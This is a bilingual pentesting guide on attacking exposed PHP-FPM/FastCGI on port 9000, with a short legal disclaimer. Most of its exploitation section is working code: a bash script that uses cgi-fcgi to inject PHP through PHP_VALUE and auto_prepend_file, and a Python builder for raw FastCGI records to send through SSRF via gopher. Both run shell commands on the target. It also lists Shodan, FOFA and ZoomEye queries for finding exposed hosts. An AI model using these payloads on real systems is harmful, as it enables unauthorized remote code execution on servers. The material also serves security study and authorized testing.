9000 - Fastcgi

💡 学习提示: 本文档介绍 9000 - FastCGI 的渗透测试方法,适合信息安全初学者和从业人员参考。

⚠️ 法律声明: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。

⚠️ 法律声明: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。

9000 渗透测试 FastCGI

基本信息

If you want to learn what is FastCGI check the following page:

pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md

By default FastCGI run in port 9000 and isn’t recognized by nmap. Usually FastCGI only listen in localhost.

信息收集 / Quick checks

  • 端口 scan: nmap -sV -p9000 <target> (will often show “unknown” service; manually test).
  • Probe FPM status page: SCRIPT_FILENAME=/status SCRIPT_NAME=/status REQUEST_METHOD=GET cgi-fcgi -bind -connect 127.0.0.1:9000 (default php-fpm pm.status_path).
  • Find reachable sockets via SSRF: if an HTTP service is exploitable for SSRF, try gopher://127.0.0.1:9000/_... payloads to hit the FastCGI listener.
  • Nginx misconfigs: cgi.fix_pathinfo=1 with fastcgi_split_path_info errors let you append /.php to static files and reach PHP (code exec via traversal).

远程代码执行

It’s quite easy to make FastCGI execute arbitrary code:

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';" 
FILENAMES="/var/www/public/index.php" # Exisiting file path

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
    OUTPUT=$(mktemp)
    env -i \
      PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
      SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
      cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

    cat $OUTPUT
done

or you can also use the following python script: https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75

SSRF/gopher to FastCGI (when 9000 is not directly reachable)

If you only control an SSRF primitive, you can still hit FastCGI using the gopher scheme and craft a full FastCGI request. 示例 payload builder:

import struct, socket
host, port = "127.0.0.1", 9000
params = {
    b"REQUEST_METHOD": b"POST",
    b"SCRIPT_FILENAME": b"/var/www/html/index.php",
    b"PHP_VALUE": b"auto_prepend_file=php://input\nallow_url_include=1"
}
body = b"<?php system('id'); ?>"

def rec(rec_type, content, req_id=1):
    return struct.pack("!BBHHBB", 1, rec_type, req_id, len(content), 0, 0) + content

def enc_params(d):
    out = b""
    for k, v in d.items():
        out += struct.pack("!B", len(k)) + struct.pack("!B", len(v)) + k + v
    return out
payload  = rec(4, enc_params(params)) + rec(4, b"")  # FCGI_PARAMS + terminator
payload += rec(5, body)                                # FCGI_STDIN

s = socket.create_connection((host, port))
s.sendall(payload)
print(s.recv(4096))

Convert payload to URL-safe base64/percent-encoding and send via gopher://host:9000/_<payload> in your SSRF.

Notes on recent issues

  • libfcgi <= 2.4.4 integer overflow (2024): crafted nameLen/valueLen in FastCGI records can overflow on 32‑bit builds (common in embedded/IoT), yielding heap 远程代码执行 when the FastCGI socket is reachable (directly or via SSRF).
  • PHP-FPM log manipulation (CVE-2024-9026): when catch_workers_output = yes, attackers who can send FastCGI requests may truncate or inject up to 4 bytes per log line to erase indicators or poison logs.
  • Classic Nginx + cgi.fix_pathinfo misconfig: still widely seen; if fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; is used without file existence checks, any path ending in .php gets executed, enabling path traversal or source overwrite style gadgets.

搜索引擎语法

FOFA

# FOFA 搜索语法
port="9000"

Shodan

# Shodan 搜索语法
port:9000

ZoomEye

# ZoomEye 搜索语法
port:9000

📖 参考资料